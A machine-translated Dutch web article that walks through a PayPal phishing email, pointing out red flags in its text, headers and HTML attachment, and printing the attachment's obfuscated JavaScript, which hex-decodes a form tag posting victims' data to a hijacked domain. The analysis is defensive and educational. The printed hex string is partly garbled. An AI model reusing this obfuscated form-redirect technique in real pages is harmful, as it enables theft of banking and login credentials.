Online beveiliging: de anatomie van een phishing-e-mail doorbreken

Jun 25, 2025
Privacy en veiligheid
ONGECAAKTE CONTENT


In de wereld van vandaag waar de informatie van iedereen online is, is phishing een van de meest populaire en verwoestende online aanvallen, omdat je altijd een virus kunt opruimen, maar als je bankgegevens worden gestolen, heb je problemen. Hier is een overzicht van een van deze aanvallen die we hebben ontvangen.

Denk niet dat het alleen uw bankgegevens zijn die belangrijk zijn: als iemand controle krijgt over uw accountaanmelding, kent hij niet alleen de informatie in dat account, maar de kans is groot dat dezelfde aanmeldingsgegevens op verschillende andere rekeningen. En als ze uw e-mailaccount in gevaar brengen, kunnen ze al uw andere wachtwoorden opnieuw instellen.

Dus naast het behouden van sterke en variërende wachtwoorden, moet u altijd uitkijken naar nep-e-mails die zich voordoen als het echte werk. Hoewel de meeste phishing-pogingen amateuristisch zijn, zijn sommige behoorlijk overtuigend, dus het is belangrijk om te begrijpen hoe u ze aan de oppervlakte kunt herkennen en hoe ze onder de motorkap werken.

Afbeelding door asirap

Onderzoeken wat duidelijk is

Onze voorbeeld-e-mail stelt u, net als de meeste phishing-pogingen, op de hoogte van activiteit op uw PayPal-rekening die onder normale omstandigheden alarmerend zou zijn. Dus de oproep tot actie is om uw account te verifiëren / herstellen door zowat elk stukje persoonlijke informatie dat u maar kunt bedenken in te dienen. Nogmaals, dit is behoorlijk formeel.

Hoewel er zeker uitzonderingen zijn, wordt vrijwel elke phishing- en scam-e-mail rechtstreeks in het bericht zelf geladen met rode vlaggen. Zelfs als de tekst overtuigend is, zijn er meestal veel fouten in de berichttekst die aangeven dat het bericht niet legitiem is.

De berichttekst

Op het eerste gezicht is dit een van de betere phishing-e-mails die ik heb gezien. Er zijn geen spellings- of grammaticale fouten en de woordenstroom leest volgens wat u zou verwachten. Er zijn echter een paar rode vlaggen die u kunt zien als u de inhoud wat nauwkeuriger bekijkt.

  • "Paypal" - Het juiste geval is "PayPal" (hoofdletter P). U kunt zien dat beide varianten in het bericht worden gebruikt. Bedrijven zijn zeer weloverwogen met hun branding, dus het is twijfelachtig dat zoiets het proofingproces zou doorstaan.
  • "Allow ActiveX" - Hoe vaak heb je een legitiem webgebaseerd bedrijf zo groot als Paypal een eigen component zien gebruiken die alleen op een enkele browser werkt, vooral wanneer ze meerdere browsers ondersteunen? Zeker, ergens daarbuiten doet een bedrijf het, maar dit is een rode vlag.
  • "Veilig." - Merk op dat dit woord niet in de kantlijn is uitgelijnd met de rest van de alineatekst. Zelfs als ik het raam wat meer uitrek, wordt het niet correct ingekapseld of geplaatst.
  • "Paypal!" - De spatie voor het uitroepteken ziet er vreemd uit. Gewoon een andere gril waarvan ik zeker weet dat deze niet in een legitieme e-mail zou staan.
  • "PayPal- Account Update Form.pdf.htm" - Waarom zou Paypal een "pdf" bijvoegen, vooral als ze gewoon naar een pagina op hun site konden linken? Waarom zouden ze bovendien proberen een HTML-bestand als pdf te verhullen? Dit is de grootste rode vlag van allemaal.

De berichtkop

Als je de berichtkop bekijkt, verschijnen er nog een paar rode vlaggen:

  • Het van-adres is [email protected] .
  • Het aan-adres ontbreekt. Ik heb dit niet weggelaten, het maakt gewoon geen deel uit van de standaard berichtkop. Meestal zal een bedrijf met uw naam de e-mail voor u personaliseren.

De bijlage

Als ik de bijlage open, zie je meteen dat de lay-out niet correct is omdat er stijlinformatie ontbreekt. Nogmaals, waarom zou PayPal een HTML-formulier e-mailen als ze u gewoon een link op hun site zouden kunnen geven?

Notitie: we hebben hiervoor de ingebouwde HTML-bijlageviewer van Gmail gebruikt, maar we raden je aan GEEN bijlagen van oplichters te OPENEN. Nooit. Ooit. Ze bevatten vaak exploits die trojans op uw pc installeren om uw accountgegevens te stelen.

Als u iets verder naar beneden scrolt, ziet u dat dit formulier niet alleen om onze PayPal-inloggegevens vraagt, maar ook om bank- en creditcardgegevens. Sommige afbeeldingen zijn verbroken.

Het is duidelijk dat deze phishing-poging alles met één klap achterna gaat.

De technische storing

Hoewel het vrij duidelijk zou moeten zijn op basis van wat duidelijk is dat dit een phishing-poging is, gaan we nu de technische opmaak van de e-mail opsplitsen en kijken wat we kunnen vinden.

Informatie uit de bijlage

Het eerste dat u moet bekijken, is de HTML-bron van het bijlageformulier, dat de gegevens naar de nepsite verzendt.

Als je snel de bron bekijkt, lijken alle links geldig omdat ze verwijzen naar ‘paypal.com’ of ‘paypalobjects.com’, die beide legitiem zijn.

Nu gaan we enkele basispagina-informatie bekijken die Firefox op de pagina verzamelt.

Zoals u kunt zien, zijn sommige afbeeldingen afkomstig van de domeinen "blessedtobe.com", "goodhealthpharmacy.com" en "pic-upload.de" in plaats van de legitieme PayPal-domeinen.

Informatie uit de e-mailkopteksten

Vervolgens zullen we de onbewerkte kopteksten van e-mailberichten bekijken. Gmail stelt dit beschikbaar via de menuoptie Origineel weergeven in het bericht.

Als u naar de koptekstinformatie van het oorspronkelijke bericht kijkt, kunt u zien dat dit bericht is opgesteld met Outlook Express 6. Ik betwijfel of PayPal iemand in dienst heeft die elk van deze berichten handmatig verzendt via een verouderde e-mailclient.

Als we nu naar de routeringsinformatie kijken, kunnen we het IP-adres zien van zowel de afzender als de doorsturende mailserver.

Het "Gebruiker" IP-adres is de oorspronkelijke afzender. Als we de IP-informatie snel opzoeken, kunnen we zien dat het verzendende IP-adres zich in Duitsland bevindt.

En als we kijken naar het IP-adres van de relay-mailserver (mail.itak.at), kunnen we zien dat dit een ISP is in Oostenrijk. Ik betwijfel of PayPal hun e-mails rechtstreeks via een in Oostenrijk gevestigde ISP stuurt als ze een enorme serverfarm hebben die deze taak gemakkelijk aankan.

Waar gaan de gegevens naartoe?

We hebben dus duidelijk vastgesteld dat dit een phishing-e-mail is en hebben wat informatie verzameld over waar het bericht vandaan komt, maar hoe zit het met waar uw gegevens naartoe worden gestuurd?

Om dit te kunnen zien, moeten we eerst de HTM-bijlage op ons bureaublad opslaan en openen in een teksteditor. Als je erdoorheen scrolt, lijkt alles in orde te zijn, behalve wanneer we bij een verdacht uitziend Javascript-blok komen.

Als we de volledige bron van het laatste Javascript-blok doorbreken, zien we:

<script language = ”JavaScript” type = ”text / javascript”>
// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e” y =”; for (i = 0; i <gelijk aan x.length; i + = 2) {y+=unescape(‘%’+x.substr(i,2));}document.write (y);
</script>

Elke keer dat u een grote door elkaar gegooide reeks schijnbaar willekeurige letters en cijfers in een Javascript-blok ziet, is dit meestal iets verdachts. Als we naar de code kijken, wordt de variabele "x" op deze grote string gezet en vervolgens gedecodeerd in de variabele "y". Het uiteindelijke resultaat van variabele "y" wordt dan als HTML naar het document geschreven.

Omdat de grote reeks bestaat uit de cijfers 0-9 en de letters a-f, wordt deze hoogstwaarschijnlijk gecodeerd via een eenvoudige ASCII naar Hex-conversie:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706

Vertaald naar:

<form name = "main" id = "main" method = "post" action = "http://www.dexposure.net/bbs/data/verify.php">

Het is geen toeval dat dit wordt gedecodeerd tot een geldige HTML-formuliertag die de resultaten niet naar PayPal stuurt, maar naar een malafide site.

Bovendien, wanneer u de HTML-bron van het formulier bekijkt, zult u zien dat deze formulier-tag niet zichtbaar is omdat deze dynamisch wordt gegenereerd via Javascript. Dit is een slimme manier om te verbergen wat de HTML eigenlijk doet als iemand gewoon de gegenereerde bron van de bijlage zou bekijken (zoals we eerder deden) in plaats van de bijlage rechtstreeks in een teksteditor te openen.

Als we een snelle whois uitvoeren op de overtredende site, kunnen we zien dat dit een domein is dat wordt gehost bij een populaire webhost, 1and1.

Wat opvalt is dat het domein een leesbare naam gebruikt (in tegenstelling tot zoiets als “dfh3sjhskjhw.net”) en dat het domein 4 jaar is geregistreerd. Daarom denk ik dat dit domein is gekaapt en als pion is gebruikt in deze phishingpoging.

Cynisme is een goede verdediging

Als het erop aankomt online veilig te blijven, kan het nooit kwaad om een ​​beetje cynisme te hebben.

Hoewel ik er zeker van ben dat er meer rode vlaggen in de voorbeeld-e-mail zijn, hebben we hierboven aangegeven indicatoren die we al na een paar minuten onderzoek zagen. Hypothetisch, als het oppervlakniveau van de e-mail zijn legitieme tegenhanger 100% zou nabootsen, zou de technische analyse nog steeds de ware aard ervan onthullen. Daarom is het belangrijk om te kunnen onderzoeken wat je wel en niet kunt zien.

.entry-inhoud .entry-footer

Breaking Bad Security Tutorial 1 - Email Phishing

Anatomy Of Phishing Campaigns: A Gmail Perspective

How To Identify A Phishing Email

[CYBER FRIGHT] Anatomy Of A Phishing Email

Security Awareness Quick Tip: How To Identify And Avoid Email Phishing Scams - Part 1

Cyber Security & Phishing

Understanding Anatomy Of Phishing Attack

Anatomy Of A Phishing Attack With DNSFilter

8th PPO-SA Webinar: Cyber Security: Beware Of Phishing Attach!

Cybersecurity Training How To Spot A Phishing Email

The Truth About Phishing: It Only Takes One

Anatomy Of Scam Emails - How To Recognise A Phishing Scam Message

Phishing Attack Example - How To Spot A Scam Email

What Is Phishing?

How To Spot A Phishing Fraud Email - Fun With Phishing | Tech Tip Tuesday

Hands-on Computer Security & Incident Response -- Email Header Analysis Part 1

Anatomy Of A Spearphishing Attack


Privacy en veiligheid - Meest populaire artikelen

Wat is een Wangiri- of "One Ring" -telefoonoplichting?

Privacy en veiligheid Dec 5, 2024

Wapen / shutterstock.com De hele dag hebben vreemde buitenlandse nummers je telefoon gebeld. Ze komen uit een land dat je nog nooit hebt bezocht...


Hoe krijgen spammers uw e-mailadres?

Privacy en veiligheid Sep 21, 2025

Spam lijkt te komen in elk e-mailaccount dat we gebruiken, hoe voorzichtig we ook zijn. Hoe komen spammers aan al onze e-mailadressen? En kunnen we er iets aan doen om ons e-mailadr..


Apple Pay instellen en gebruiken op uw Apple Watch

Privacy en veiligheid Dec 21, 2024

ONGECAAKTE CONTENT Dankzij de toename van het aantal Apple Pay-compatibele terminals die overal bij winkels opduiken, is het gemakkelijker dan ooit om voor uw aankopen te betalen ..


Hoe dwing je Google Chrome om waar mogelijk HTTPS te gebruiken in plaats van HTTP?

Privacy en veiligheid Aug 14, 2025

Met de constante veiligheidsbedreigingen waarmee we dagelijks worden geconfronteerd tijdens het surfen op internet, loont het om dingen zo veel mogelijk te vergrendelen. Met dat in ..


De digitale locker die Hollywood wil gebruiken: UltraViolet uitgelegd

Privacy en veiligheid Mar 24, 2025

ONGECAAKTE CONTENT UltraViolet is een "digitale locker" voor uw films ontworpen door de grote filmstudio's. Het is een reactie op iTunes: studio's willen niet dat al hun klanten i..


Geek School: Windows 7 leren - toegang tot bronnen

Privacy en veiligheid Mar 21, 2025

ONGECAAKTE CONTENT In deze installatie van Geek School kijken we naar mapvirtualisatie, SID's en toestemming, evenals naar het coderingsbestandssysteem. Bekijk de vorige ..


De beste tips en aanpassingen om het meeste uit Google Chrome te halen

Privacy en veiligheid Sep 13, 2025

ONGECAAKTE CONTENT Onlangs hebben we de beste tips en tweaks voor Firefox . Google Chrome is een andere erg populaire browser en we hebben hier een aantal zeer nutt..


Hoe Javascript in Adobe Reader uit te schakelen en het nieuwste enorme beveiligingsgat te patchen

Privacy en veiligheid Dec 15, 2024

Nogmaals, Adobe heeft bevestigde een gigantisch beveiligingslek in hun buggy, opgeblazen en volkomen onveilige Adobe PDF Reader-applicatie. Dit is ook niet de eerste keer: het ..


Categorieën